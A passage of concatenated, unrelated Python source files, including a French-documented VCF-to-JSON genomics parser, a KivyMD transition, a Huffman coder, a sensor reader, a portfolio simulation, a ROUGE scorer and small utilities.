nom du contig. Chaque valeur de ce dictionnaire est un tuple qui
contient de nouveau le nom du contig et sa taille. On extrait la
clef du dictionnaire et la seconde position du tuple pour en faire
un nouveau dictionnaire qui contient en clef, le nom du contig et
en valeur sa taille.
Args:
self.vcf_reader: a VCFReader object
Returns:
void
"""
try :
contig = {}
for i in self.vcf_reader.contigs:
contig[i] = self.vcf_reader.contigs[i][1]
self.dico_contig = contig
# print (self.dico_contig)
except IOError as e:
print (e.errno)
def _extract_info(self) :
""" method permettant l'extraction des INFOS du fichier VCF
Les headers représentant les fichiers VCF,sont représentés de la
manière sivante :
##INFO=<ID=ID,Number=number,Type=type,Description=”description”>
Parcours le dictionnaire des INFO du VCF, chaque clef étant le
l'identifiant de l'information. Chaque valeur de ce dictionnaire est
une liste qui contient le Number,Type,Description. On extrait la clef du
dictionnaire et la valeur qui contient les informations complémentaire.
Certaines valeurs de Number ont été convertie : "-1" --> A et "0"
--> ".". Lors de l'utilisation du module PyVCF, ils nous a ainsi donc
fallut rectifier ces erreurs.
Args:
self.vcf_reader: a VCFReader object
Return:
void
"""
try :
dict_field_info = {}
for key in self.vcf_reader.infos:
dict_field_info[key] = list(self.vcf_reader.infos[key][1:])
except IOError as e:
print (e.errno)
try :
for value in dict_field_info.values():
if value[0] == -1 :
value[0] = 'A'
elif value[0] == 0 :
value[0] = '.'
self.infos = dict_field_info
# print (self.infos)
except Exception as e:
print (e.message, e.args)
def _is_annotated (self) :
""" method permettant de determiner si le fichier est annoté ou pas !
Parcours des lignes de variants et vérification si ces variants ont
été annoté par un logiciel quelconque.
Si l'onglet "CSQ" est présent dans la ligne du variant, dans ce cas
le fichier est annoté, dans le cas contraire, le fichier n'est pas annoté.
Args:
self.vcf_reader: a VCFReader object
PARAMS output:
- Void
"""
try :
dico_select_info = {}
for record in self.vcf_reader:
for inf in record.INFO:
dico_select_info[inf] = record.INFO[inf]
except Exception as e :
print (e.message, e.args)
try :
key_list = []
arg = 'CSQ'
for key_info in dico_select_info.keys() :
key_list.append(key_info)
if arg not in key_list :
self.annotated = False
else :
self.annotated = True
# print (self.annotated)
except Exception as e :
print (e.message, e.args)
def _found_patient (self) :
""" method permettant de récupérer le nom du patient
A partir du module PyVcf, utilisation d'une méthode d'objet pour
récupérer les noms du samples.
Args:
self.vcf_reader: a VCFReader object
PARAMS output:
- Void
"""
try :
self.patient_name = self.vcf_reader.samples
except Exception as e :
print (e.message, e.args)
def _extract_metadata(self):
""" method permettant l'extraction des Metadata du fichier VCF
Les Metadatas sont les lignes du fichier VCF possédant les
informations descriptives de l'échantillon.
Parcours du dictionnaire des META du VCF, chaque clef étant le
l'identifiant de l'information. Chaque valeur de ce dictionnaire est
un string qui contient informations de cette clé. On extrait la clef
du dictionnaire et le string de chaque clé qui contient l'information
Args:
self.vcf_reader: a VCFReader object
PARAMS output:
- Void
"""
try :
self.metadata = {}
meta = self.vcf_reader.metadata
for i in meta :
self.metadata[i]= meta[i]
# print(self.metadata)
except Exception as e:
print (e.message, e.args)
def _extract_format(self):
""" method permettant l'extraction de l'header "FORMAT" du fichier VCF
Format ==> liste extensible (facultatif) des champs pour décrire les
échantillons.
On va parcourir le dictionnaire "FORMAT" du vcf, chaque clef étant le
l'identifiant de l'information. Chaque valeur de ce dictionnaire est
un string qui contient informations de cette clé. On extrait la clef
du dictionnaire et string de chaque clé qui contient l'information.
Args:
self.vcf_reader: a VCFReader object
PARAMS output:
- Void
"""
try :
self.format = {}
form = self.vcf_reader.formats
for i in form :
self.format[i] = form[i]
#print (self.format)
except Exception as e:
print (e.message, e.args)
def _variant_information (self):
""" method permettant l'extraction des INFORMATIONS du fichier VCF.
[CHR_POS_REF_ALT] : {"SOURCE" : {"CHROM" : "chr1", "POS" : 10,
"REF" : ...., "ALT" : (...,...), "INFO" : ....., "FORMAT" : '0/1',1/1}}
Dans un premier temps, on a creé pour chaque variant une liste contenant
le chromosome, position, référence, alternative.
Cette method va retourner un dictionnaire principale contenant cette
liste. En valeur de chaqu'une de ces variants, nous aurons un dictionnaire
avec en clé la liste et en valeurs les différentes informations de ces
variants. (voir exemple ci_dessus)
Args:
self.vcf_reader: a VCFReader object
Return :
Void
"""
dico_total3 = {}
dico_actual_variant = {}
source_name = str(tuple(self.metadata[self.source]))
#Erreur ici a cooriger
for record in self.vcf_reader :
# alt_list = []
# print(str(record.ALT[0]))
# for alt in record.ALT :
# alt_list.append(str(alt))
# tupleKey = tuple (alt_list)
record_ALT = [str(i) for i in record.ALT]
name_key = record.CHROM+"_"+str(record.POS)+"_"+record.REF+"_"+"-".join(record_ALT)
name_key_str = str(name_key)
dico_total = {}
dico_total2 ={}
dico_total[self.__class__.CHROM]=record.CHROM
dico_total[self.__class__.POS]=record.POS
dico_total[self.__class__.ID]=record.ID
dico_total[self.__class__.REF]=record.REF
dico_total[self.__class__.ALT]=record_ALT
dico_total[self.__class__.QUAL]=record.QUAL
dico_total[self.__class__.FILTER]=record.FILTER
dico_total[self.__class__.INFO]=record.INFO
dico_sample = {}
# ------> On va spliter ex => GT:AD:GQ:PL
s=record.samples[0]
for f in range (len(record.FORMAT.split(":"))) :
dico_sample[record.FORMAT.split(":")[f]] = str(s.data[f])
#print (dico_sample)
dico_total["FORMAT"]=dico_sample
dico_total2[source_name] = dico_total
dico_total3[name_key_str] = dico_total2
self.variants = dico_total3
#print (self.variants)
def variants_to_json(self, json_filepath) :
""" method permettant l'obtention d'un fichier Json
Dans ce fichier Json, nous aurons le nom du patient ainsi que tous
les variants de celui-ci.
Args:
json_filepath: a str object for the json filepath. The corresponding
file will be created.
PARAMS output:
- void
"""
dico_json_variants = {}
dico_json_variants[self.__class__.SAMPLE_NAME] = self.patient_name
dico_json_variants[self.__class__.VARIANTS] = self.variants
print (type(self.variants))
print (type(dico_json_variants))
try :
with open(json_filepath,"w") as json_file:
json_file.write(json.dumps(dico_json_variants))
json_file.close()
except IOError as e:
print (e.errno)
def header_to_json(self, json_filepath):
""" method permettant l'obtention d'un fichier Json
Dans ce fichier Json contenant uniquement les headers, nous aurons ainsi:
-> le nom des patients
-> les CONTIGS
-> les formats
-> les infos
-> les metadatas
-> bool si le fichier est annoté ou pas
Args:
json_filepath: a str object for the json filepath. The corresponding
file will be created.
PARAMS output:
- void
"""
dico_json_header = {}
dico_json_header[self.__class__.SAMPLE_NAME] = self.patient_name
dico_json_header[self.__class__.CONTIGS] = self.dico_contig
dico_json_header[self.__class__.FORMAT] = self.format
dico_json_header[self.__class__.INFORMATION] = self.infos
dico_json_header[self.__class__.METADATA] = self.metadata
dico_json_header[self.__class__.ANNOTATION] = self.annotated
try :
with open(json_filepath, "w") as json_file :
json_file.write(json.dumps(dico_json_header))
json_file.close()
except IOError as e :
print (e.errno)
def vcf_to_json (self, json_filepath):
""" method permettant l'obtention d'un fichier Json
Dans ce fichier nous aurons les headers ainsi que les variants dans
notre fichier Json.
Args:
json_filepath: a str object for the json filepath. The corresponding
file will be created.
Return :
void
"""
dico_json_dictionary = {}
dico_json_dictionary[self.__class__.SAMPLE_NAME] = self.patient_name
dico_json_dictionary[self.__class__.CONTIGS] = self.dico_contig
dico_json_dictionary[self.__class__.FORMAT] = self.format
dico_json_dictionary[self.__class__.INFORMATION] = self.infos
dico_json_dictionary[self.__class__.METADATA] = self.metadata
dico_json_dictionary[self.__class__.ANNOTATION] = self.annotated
dico_json_dictionary[self.__class__.VARIANTS] = self.variants
try :
with open( str(json_filepath),"w") as json_file:
json_file.write(json.dumps(dico_json_dictionary))
json_file.close()
except IOError as e:
print (e.errno)
@classmethod
def merge_to_json(cls, vcf_1, vcf_2, json_filepath) :
""" method permettant de merger les variants du vcf_1 et du
vcf_2 et de produire un fichier Json.
[CHR_POS_REF_ALT] : {"VarCaller" : {"CHROM" : "chr1", "POS" : 10,
"REF" : ...., "ALT" : (...,...), "INFO" : ....., "FORMAT" : '0/1',1/1}
{"VarScan" : [None]}}
A partir de ce dictionnaire, nous allons vérifier si la clé du dictionnaire
de vcf_1 est similaire à la clé de vcf_2. Si c'est le cas, nous
allons ainsi récupérer les valeurs du dictionnaire "variants" des
2 objets vcf_1 et vcf_2.
Dans le cas ou la clé du dictionnaire de vcf_1 est différente
de celle de vcf_2, on récupère la valeure de vcf_1 et pas celle
de vcf_2 (None)
Args:
vcf_1: instance de VCF
vcf_2: instance de VCF
json_filepath: a str object for the json filepath. The corresponding
file will be created.
Return :
void
"""
try :
dico_merge_variant_caller = {}
for key_caller, value_caller in vcf_1.variants.items():
#print(key_caller)
dico_merge_variant_caller[key_caller]={**vcf_1.variants.get(key_caller),**vcf_2.variants.get(key_caller,{str(vcf_2.metadata[self.source]): None})}
with open(str(json_filepath),"w") as json_file:
json_file.write(json.dumps(dico_merge_variant_caller))
json_file.close()
except IOError as e:
print (e.errno)
json_file.close()
def retain_all (self, vcf_1) :
""" method d'instance permettant de modifier les variants de l'instance
Vcf actuelle en ne gardant que les variants communs avec le vcf_1 donné
en paramêtre.
[CHR_POS_REF_ALT] : {"SOURCE" : {"CHROM" : "chr1", "POS" : 10,
"REF" : ...., "ALT" : (...,...), "INFO" : ....., "FORMAT" : '0/1',1/1}}
Nous allons recupérer les variants qui sont identique a ceux
du vcf_1.
Pour cela nous allons parcourir la liste de variants la plus petite entre
celle de l'instance de Vcf actuelle et celle du paramêtre et sélectionner
uniquement les variants communs.
Args:
vcf_1: instance de Vcf
Return :
Void
"""
keys_a = set(vcf_1.variants.keys())
keys_b = set(vcf_1.variants.keys())
final_variant = {}
source_dict={}
dest_dict={}
if len(self.variants.keys()) > len(vcf_1.variants.keys()) :
source_dict = vcf_1.variants.keys()
dest_dict = self.variants
else :
source_dict = self.variants.keys()
dest_dict = vcf_1.variants
for key in source_dict :
if dest_dict.get(key) != None :
final_variant[key] = self.variants[key]
self.variants = final_variant
|
"""
Components/Transition
=====================
.. rubric::
A set of classes for implementing transitions between application screens.
.. versionadded:: 1.0.0
Changing transitions
--------------------
You have multiple transitions available by default, such as:
- :class:`MDFadeSlideTransition`
state one: the new screen closes the previous screen by lifting from the
bottom of the screen and changing from transparent to non-transparent;
state two: the current screen goes down to the bottom of the screen,
passing from a non-transparent state to a transparent one, thus opening the
previous screen;
.. note::
You cannot control the direction of a slide using the direction attribute.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/transition-md-fade-slide-transition.gif
:align: center
"""
__all__ = ("MDFadeSlideTransition",)
from kivy.animation import Animation, AnimationTransition
from kivy.uix.screenmanager import (
ScreenManager,
ScreenManagerException,
SlideTransition,
)
class MDFadeSlideTransition(SlideTransition):
_direction = "up"
def start(self, instance_screen_manager: ScreenManager) -> None:
"""
Starts the transition. This is automatically called by the
:class:`ScreenManager`.
"""
if self.is_active:
raise ScreenManagerException("start() is called twice!")
self.manager = instance_screen_manager
self._anim = Animation(d=self.duration, s=0)
self._anim.bind(
on_progress=self._on_progress, on_complete=self._on_complete
)
if self._direction == "up":
self.add_screen(self.screen_in)
else:
self.add_screen(self.screen_in)
self.add_screen(self.screen_out)
self.screen_in.transition_progress = 0.0
self.screen_in.transition_state = "in"
self.screen_out.transition_progress = 0.0
self.screen_out.transition_state = "out"
self.screen_in.dispatch("on_pre_enter")
self.screen_out.dispatch("on_pre_leave")
self.is_active = True
self._anim.start(self)
self.dispatch("on_progress", 0)
if self._direction == "up":
self.screen_in.y = 0
self.screen_in.opacity = 0
def on_progress(self, progression: float) -> None:
progression = AnimationTransition.out_quad(progression)
if self._direction == "up":
self.screen_in.y = (
self.manager.y + self.manager.height * progression
) - self.screen_in.height
self.screen_in.opacity = progression
if self._direction == "down":
self.screen_out.y = (
self.manager.y - self.manager.height * progression
)
self.screen_out.opacity = 1 - progression
def on_complete(self) -> None:
if self._direction == "down":
self._direction = "up"
else:
self._direction = "down"
super().on_complete()
|
from queue import Queue
class Node:
def __init__(self, char, count):
self.ch = char
self.ct = count
self.lt = None
self.rt = None
def __repr__(self):
return "{}=>[ct={},lt={},rt={}]".format(self.ch, self.ct, self.lt, self.rt)
def parse_queue_and_get_tree(nq):
if nq.qsize() == 1:
node = nq.get()
return node
n1 = nq.get()
n2 = nq.get()
par = Node(None, n1.ct + n2.ct)
par.lt = n1
par.rt = n2
nq.put(par)
return parse_queue_and_get_tree(nq)
def build_tree(words):
ch_dict = dict()
for word in words:
for char in word:
if not char in ch_dict:
ch_dict[char] = 0
ch_dict[char] += 1
print(ch_dict)
nodes = list()
for char in ch_dict:
nodes.append(Node(char, ch_dict[char]))
nodes.sort(key=lambda x: x.ct)
if not nodes:
return Node(None, 0)
nq = Queue()
for node in nodes:
nq.put(node)
tree = parse_queue_and_get_tree(nq)
return tree
def update_char_map(htree, char_map, hcode=""):
if htree.ch:
char_map[htree.ch] = hcode
return
update_char_map(htree.lt, char_map, hcode + "0")
update_char_map(htree.rt, char_map, hcode + "1")
# Tests
htree = build_tree(["cats", "cars", "dogs"])
char_map = dict()
update_char_map(htree, char_map)
print(char_map)
htree = build_tree(["cat", "car", "dog"])
char_map = dict()
update_char_map(htree, char_map)
print(char_map)
|
#!/usr/bin/env python
import os
import sys
os.chdir(sys._MEIPASS)
import data6
print os.getcwd()
|
# -*- coding: utf-8 -*-
from .queues import QueueInterruptable, is_main_alive
from .concurrent import Threaded
from .ilogging import logg
from time import sleep
class ActiveQ(QueueInterruptable):
def __init__(self, maxsize=256, jobq=None, resq=None):
self._run_thread = None
self._resq = resq # result q
self._jobq = jobq # input q
super(ActiveQ, self).__init__(maxsize)
def start(self):
# assert self._thread is None
assert self._run_thread is None
self._run_thread = Threaded(self._run)
return self
def _run(self):
logg.info('run started')
while not self.finish and is_main_alive():
try:
item = self.get(block=False, timeout=0.01)
except QueueInterruptable.Empty as e:
# raise e
sleep(0.01)
if self._jobq:
try:
item = self._jobq.get(block=False)
except StopIteration:
logg.info('stop iteration')
break
except QueueInterruptable.Empty as e:
continue
self.put(item, block=True)
continue
# logg.info(item)
assert isinstance(item, tuple)
# fun, args, kwargs = item
# res = fun(*args, **kwargs)
res = self.action(item)
if self._resq:
self._resq.put(res, block=True)
self._run_thread = None
def action(self, item):
"""
for overriding
:param item:
:return:
"""
fun, args, kwargs = item
return fun(*args, **kwargs)
def push_job(self, fun, *args, **kwargs):
"""
put job if possible, non-blocking
:param fun:
:param args:
:param kwargs:
:return:
"""
assert callable(fun)
return self.put((fun, args, kwargs), block=True)
def put_job(self, fun, *args, **kwargs):
"""
put job if possible, non-blocking
:param fun:
:param args:
:param kwargs:
:return:
"""
if not args and not kwargs and isinstance(fun, (tuple, list)):
# ex) q.put_job([fun, args, kwargs])
fun, args, kwargs = fun
assert callable(fun)
return self.put((fun, args, kwargs), block=False)
if __name__ == '__main__':
import sys
def testfun(i):
print(i)
sys.stdout.flush()
return i
q = ActiveQ(10).start()
for i in range(10):
q.push_job(testfun, i)
while not q.empty():
pass
q.stop()
print('done')
|
"""empty message
Revision ID: 0a1a1fcb6302
Revises:
Create Date: 2018-05-26 20:35:58.639216
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '0a1a1fcb6302'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('dish',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=512), nullable=True),
sa.Column('co2', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('meal',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('recipe', sa.String(length=512), nullable=True),
sa.Column('picture', sa.String(length=512), nullable=True),
sa.Column('label', sa.String(length=100), nullable=True),
sa.Column('dish_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['dish_id'], ['dish.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('meal')
op.drop_table('dish')
# ### end Alembic commands ###
|
#!/usr/bin/env python
import os
import time
#----------------------------------------------------------------
# Note:
# ds18b20's data pin must be connected to pin7(GPIO4).
#----------------------------------------------------------------
# Reads temperature from sensor and prints to stdout
# id is the id of the sensor
def readSensor(id):
tfile = open("/sys/bus/w1/devices/"+id+"/w1_slave")
text = tfile.read()
tfile.close()
secondline = text.split("\n")[1]
temperaturedata = secondline.split(" ")[9]
temperature = float(temperaturedata[2:])
temperature = temperature / 1000
print "Sensor: " + id + " - Current temperature : %0.3f C" % temperature
# Reads temperature from all sensors found in /sys/bus/w1/devices/
# starting with "28-...
def readSensors():
count = 0
sensor = ""
for file in os.listdir("/sys/bus/w1/devices/"):
if (file.startswith("28-")):
readSensor(file)
count+=1
if (count == 0):
print "No sensor found! Check connection"
# read temperature every second for all connected sensors
def loop():
while True:
readSensors()
time.sleep(1)
# Nothing to cleanup
def destroy():
pass
# Main starts here
if __name__ == "__main__":
try:
loop()
except KeyboardInterrupt:
destroy()
|
import numpy as np
import matplotlib.pyplot as plt
from distributionally_robust_portfolio import *
from SimSet2 import *
class SimSet3(DistributionallyRobustPortfolio):
m = 10
eps_range = np.concatenate([np.arange(1, 10)*10.0**(i)
for i in range(-3, 0)])
valids = normal_returns(10, 2*10**5)
def __init__(self, beta, N, k=50):
# Number of resamples
self.k = k
# Reliability threshold
self.beta = beta
# Instantiate Fusion model
super().__init__(SimSet3.m, N)
def bootstrap(self, data_sets):
'''
Method to iterate over a list of independent datasets via the iter_data
generator method so as to apply the bootstrap technique to each dataset
and then save the results.
'''
self.perf, self.cert, radii = zip(*self.iter_data(data_sets))
self.rel = np.mean(np.array(self.perf) <= np.array(self.cert), axis=0)
self.radii = np.mean(radii, axis=0)
def simulate(self, data):
'''
Method called within the iter_data generator.
Returns
out_perf: out-of-sample performance calculated with validation data
cert: performance certificate (optimal objective for M)
eps_btstrp: radius selected from holdout method
'''
# List to store reliability
rel = []
# Perform k resamples
for i in range(self.k):
# Split data into test and train
train, self.test = train_test_split(data, test_size=1/3)
# Resample train data up-to size N
train = resample(train, n_samples=self.N)
# Set TrainData parameter to train
self.dat.setValue(train)
# Iterate through a range of Wasserstein radii
rel.append(self.iter_radius(SimSet3.eps_range))
# Sum reliability over all resamples (for each epsilon)
rel = np.sum(rel, axis=0)
# Smallest radius that has reliability over 1-beta
_id = next(i for i, r in enumerate(rel) if r >= self.k*(1-self.beta))
eps_btstrp = SimSet3.eps_range[_id]
# Set TrainData parameter to data
self.dat.setValue(data)
# Set WasRadius parameter to eps_btstrp
self.eps.setValue(eps_btstrp)
self.M.solve()
# Out-of-sample performance for x_N(eps_btstrp)
out_perf = self.sample_average(
self.x.level(), self.t.level(), SimSet3.valids)
cert = self.M.primalObjValue()
return out_perf, cert, eps_btstrp
def solve(self, epsilon):
'''
Method called within the iter_radius generator.
Returns
reliability: SAA of out-of-sample performance <= certificate(epsilon)
'''
# Set WasRadius parameter to epsilon and solve
self.eps.setValue(epsilon)
self.M.solve()
# Calculate out-of-sample performance SAA estimator using test
saa = self.sample_average(self.x.level(), self.t.level(), self.test)
# Boolean to state if the certificate is greater than SAA estimate
return saa <= self.M.primalObjValue()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# java2python -> top-level package marker.
|
import os
import numpy as np
import matplotlib.pyplot as plt
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
ejemplo = plt.imread(THIS_FOLDER + "/img/vignetting.jpg")
def histograma(img):
"""Calcula y representa el histograma de una imagen RGB.
Args:
img (Numpy array 3d): Un imagen RGB
Returns:
List: Devuelve una lista con el array del histograma de cada canal RGB.
Cada canal contendra un array de dos dimensiones, la primera contendra
las intensidades y la segunda
"""
# Configuracion general de la grafica
plt.figure(4, figsize=(7, 7))
plt.suptitle('Histograma RGB', fontsize=30)
# Lista donde almacenaremos histograma de cada canal
lista = []
# Calculamos y mostramos los 3 canales RGB de la imagen entrada.
for c in range(img.shape[2]):
# Calcular histograma
vector = img[:, :, c].flatten()
unique, counts = np.unique(vector, return_counts=True)
lista.append(np.asarray((unique, counts)))
# Configuracion subplot de cada canal
plt.subplot(3, 1, c + 1)
plt.xlim(0, 255)
plt.ylim(0, np.max(lista[c][1]) + 50)
# Configuracion subplot especifica de cada canal
if c == 0:
plt.plot(lista[c][0], lista[c][1], color='r')
plt.title('Canal Rojo')
elif c == 1:
plt.plot(lista[c][0], lista[c][1], color='g')
plt.title('Canal Verde')
plt.ylabel('Nº pixeles')
elif c == 2:
plt.plot(lista[c][0], lista[c][1], color='b')
plt.title('Canal Azul')
plt.xlabel('Intensidad')
plt.tight_layout()
return lista
def histograma_acumulado(img, bins):
"""Realiza una ecualización de la imagén de entrada
Args:
img (numpy array): Array con la imagén de entrada.
bins (int): Número de intensidades de la imagén de entrada.
Returns:
Numpy array: Devuelve el array con la imagen de entrada tras aplicar la
ecualización.
"""
flat = img.flatten()
plt.figure(1)
plt.hist(flat, bins=50)
# Calcular histograma
histogram = np.zeros(bins)
for pixel in flat:
histogram[pixel] += 1
# Histograma acumulado
histogram = iter(histogram)
histogram_acum = [next(histogram)]
for i in histogram:
histogram_acum.append(histogram_acum[-1] + i)
histogram_acum = np.array(histogram_acum)
# Normalizamos a 0-255 el histograma acumulado
nj = (histogram_acum - histogram_acum.min()) * 255
N = histogram_acum.max() - histogram_acum.min()
histogram_acum = (nj / N).astype('uint8')
plt.figure(2)
plt.plot(histogram_acum)
# Obtener los valores del histograma acumulado para cada indice de la image
img_final = histogram_acum[flat]
# Forma original de la imagen
img_final = np.reshape(img_final, img.shape)
return img_final
img_final = histograma_acumulado(ejemplo, 256)
plt.figure(3)
plt.imshow(img_final)
histograma(ejemplo)
plt.figure(5)
plt.imshow(ejemplo)
plt.show()
|
# Create By : Yogesh Kothiya
# Uses : Manage Role
from flask import jsonify, request
import socket
import apis.utils.constants as CONST
from datetime import datetime, date, time, timedelta
import pymongo
from database import DB
import json
from bson import json_util, ObjectId
class crads:
def __init__(self,vendor_id=None,userId=None):
# self.todayDate = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.todayDate = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.ip_address = socket.gethostbyname(socket.gethostname())
self.user_id = userId
self.vendor_id = vendor_id
self.tbl_v005_roles = "v005_roles"
self.tbl_v018_module_access = "v018_module_access"
self.tbl_v017_modules = "v017_modules"
self.tbl_a011_settings = "a011_settings"
def adminContact(self):
adminData = DB.find_one(self.tbl_a011_settings, {"setting_for":"admin_contact"},{"_id":0,"name":1,"email":1,"mobile":1,"address":1})
return adminData
|
"""Command Line Parser realated functions.
One function creates the parser.
Another function allows hybird usage of:
- a yaml file with predefined parameters
and
- user inputted parameters through the command line.
"""
import argparse
import yaml
def create_parser():
"""Creates a parser with all the variables that can be edited by the user.
Returns:
parser: a parser for the command line
"""
parser = argparse.ArgumentParser()
parser.add_argument("--config-file", dest="config_file", type=argparse.FileType(mode="r"))
parser.add_argument("--pooling_class", default=None, type=str)
parser.add_argument("--n_pixels", default=None, type=int)
parser.add_argument("--depth", default=None, type=int)
parser.add_argument("--laplacian_type", default=None, type=str)
parser.add_argument("--type", default=None, type=str)
parser.add_argument("--sequence_length", default=None, type=int)
parser.add_argument("--prediction_shift", default=None, type=int)
parser.add_argument("--partition", default=None, nargs="+")
parser.add_argument("--batch_size", default=None, type=int)
parser.add_argument("--learning_rate", default=None, type=float)
parser.add_argument("--n_epochs", default=None, type=int)
parser.add_argument("--kernel_size", default=None, type=int)
parser.add_argument("--path_to_data", default=None)
parser.add_argument("--model_save_path", default=None)
parser.add_argument("--tensorboard_path", default=None)
parser.add_argument("--download", default=None, type=bool)
parser.add_argument("--means_path", default=None)
parser.add_argument("--stds_path", default=None)
parser.add_argument("--seed", default=None, type=int)
parser.add_argument("--reducelronplateau_mode", default=None)
parser.add_argument("--reducelronplateau_factor", default=None, type=float)
parser.add_argument("--reducelronplateau_patience", default=None, type=int)
parser.add_argument("--steplr_step_size", default=None, type=int)
parser.add_argument("--steplr_gamma", default=None, type=float)
parser.add_argument("--warmuplr_warmup_start_value", default=None, type=float)
parser.add_argument("--warmuplr_warmup_end_value", default=None, type=float)
parser.add_argument("--warmuplr_warmup_duration", default=None, type=int)
parser.add_argument("--earlystopping_patience", default=None, type=int)
parser.add_argument("--gpu", dest="device", nargs="*")
return parser
def parse_config(parser):
"""Takes the yaml file given through the command line
Adds all the yaml file parameters, unless they have already been defined in the command line.
Checks all values have been set else raises a Value error.
Args:
parser (argparse.parser): parser to be updated by the yaml file parameters
Raises:
ValueError: All fields must be set in the yaml config file or in the command line. Raises error if value is None (was not set).
Returns:
dict: parsed args of the parser
"""
args = parser.parse_args()
arg_dict = args.__dict__
if args.config_file:
data = yaml.load(args.config_file, Loader=yaml.FullLoader)
delattr(args, "config_file")
arg_dict = args.__dict__
for key, value in data.items():
# add only those not specified by the user through command line
if isinstance(value, dict):
for tag, element in value.items():
if arg_dict[tag] is None:
arg_dict[tag] = element
else:
if arg_dict[key] is None:
arg_dict[key] = value
for key, value in arg_dict.items():
if key != "device" and key != "type" and key != "sequence_length" and key != "prediction_shift" and arg_dict[key] is None:
raise ValueError("The value of {} is set to None. Please define it in the config yaml file or in the command line.".format(key))
return args
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from retrieval_rs.metric import rouge_score as rouge_score
import sys
import os
SR_DIR = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, os.pardir))
sys.path.insert(0, SR_DIR)
class Rouge:
DEFAULT_METRICS = ["rouge-1", "rouge-2", "rouge-3", "rouge-L"]
AVAILABLE_METRICS = {
"rouge-1": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 1),
"rouge-2": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 2),
"rouge-3": lambda hyp, ref: rouge_score.rouge_n(hyp, ref, 3),
"rouge-L": lambda hyp, ref:
rouge_score.rouge_l_summary_level(hyp, ref),
}
DEFAULT_STATS = ["f", "p", "r"]
AVAILABLE_STATS = ["f", "p", "r"]
def __init__(self, metrics=None, stats=None):
if metrics is not None:
self.metrics = [m.lower() for m in metrics]
for m in self.metrics:
if m not in Rouge.AVAILABLE_METRICS:
raise ValueError("Unknown metric '%s'" % m)
else:
self.metrics = Rouge.DEFAULT_METRICS
if stats is not None:
self.stats = [s.lower() for s in stats]
for s in self.stats:
if s not in Rouge.AVAILABLE_STATS:
raise ValueError("Unknown stat '%s'" % s)
else:
self.stats = Rouge.DEFAULT_STATS
def get_scores(self, hyps, refs, avg=False, ignore_empty=False):
"""
calculate the rouge score of each pair of hyps and refs
:param hyps: a raw text of predicted response
:param refs: a raw text of golden response
:param avg: average
:param ignore_empty: Filter out hyps of 0 length
:return: rouge score
"""
if isinstance(hyps, str):
hyps, refs = [hyps], [refs]
if ignore_empty:
# Filter out hyps of 0 length
hyps_and_refs = zip(hyps, refs)
hyps_and_refs = [_ for _ in hyps_and_refs if len(_[0]) > 0]
hyps, refs = zip(*hyps_and_refs)
assert(type(hyps) == type(refs))
assert(len(hyps) == len(refs))
if not avg:
return self._get_scores(hyps, refs)
return self._get_avg_scores(hyps, refs)
def _get_scores(self, hyps, refs):
scores = []
for hyp, ref in zip(hyps, refs):
sen_score = {}
# MZ: modified to handle sentences that only have dots
hyp_sents = [sent for sent in hyp.split('.') if len(sent) > 0]
if len(hyp_sents) > 0:
hyp = [" ".join(_.split()) for _ in hyp.split(".") if len(_) > 0]
ref_sents = [sent for sent in ref.split('.') if len(sent) > 0]
if len(ref_sents) > 0:
ref = [" ".join(_.split()) for _ in ref.split(".") if len(_) > 0]
#hyp = [" ".join(_.split()) for _ in hyp.split(".") if len(_) > 0]
#ref = [" ".join(_.split()) for _ in ref.split(".") if len(_) > 0]
for m in self.metrics:
fn = Rouge.AVAILABLE_METRICS[m]
sc = fn(hyp, ref)
sen_score[m] = {s: sc[s] for s in self.stats}
scores.append(sen_score)
return scores
def _get_avg_scores(self, hyps, refs):
scores = {m: {s: 0 for s in self.stats} for m in self.metrics}
count = 0
for (hyp, ref) in zip(hyps, refs):
# MZ: modified to handle sentences that only have dots
hyp_sents = [sent for sent in hyp.split('.') if len(sent) > 0]
if len(hyp_sents) > 0:
hyp = [" ".join(_.split()) for _ in hyp.split(".") if len(_) > 0]
ref_sents = [sent for sent in ref.split('.') if len(sent) > 0]
if len(ref_sents) > 0:
ref = [" ".join(_.split()) for _ in ref.split(".") if len(_) > 0]
#hyp = [" ".join(_.split()) for _ in hyp.split(".") if len(_) > 0]
#ref = [" ".join(_.split()) for _ in ref.split(".") if len(_) > 0]
for m in self.metrics:
fn = Rouge.AVAILABLE_METRICS[m]
sc = fn(hyp, ref)
scores[m] = {s: scores[m][s] + sc[s] for s in self.stats}
count += 1
scores = {m: {s: scores[m][s] / count for s in scores[m]}
for m in scores}
return scores
|
import unittest
from pathlib import Path
from tempfile import TemporaryDirectory
from wrk2img import ImageGenerator
class TestImageGenerator(unittest.TestCase):
def setUp(self):
self.image_generator = ImageGenerator()
def test_generate_image(self):
data = {
'748868.53 req/s': {
50: 250e-6,
75: 491e-6,
90: 700e-6,
99: 5.8e-3,
}
}
image = self.image_generator.generate_image(data, "localhost")
self.assertIsNotNone(image)
# TODO: write some assert
with TemporaryDirectory(dir='.') as tempdir:
output = Path(tempdir).resolve().joinpath('output.png')
self.image_generator.save_image(image, output)
self.assertTrue(output.exists())
if __name__ == '__main__':
unittest.main()
|
from project.card.card import Card
class CardRepository:
def __init__(self):
self.cards = list()
@property
def count(self):
return len(self.cards)
def add(self, card: Card):
if card.name in [c.name for c in self.cards]:
raise ValueError(f"Card {card.name} already exists!")
self.cards.append(card)
def remove(self, card_name: str):
if card_name == "":
raise ValueError("Card cannot be an empty string!")
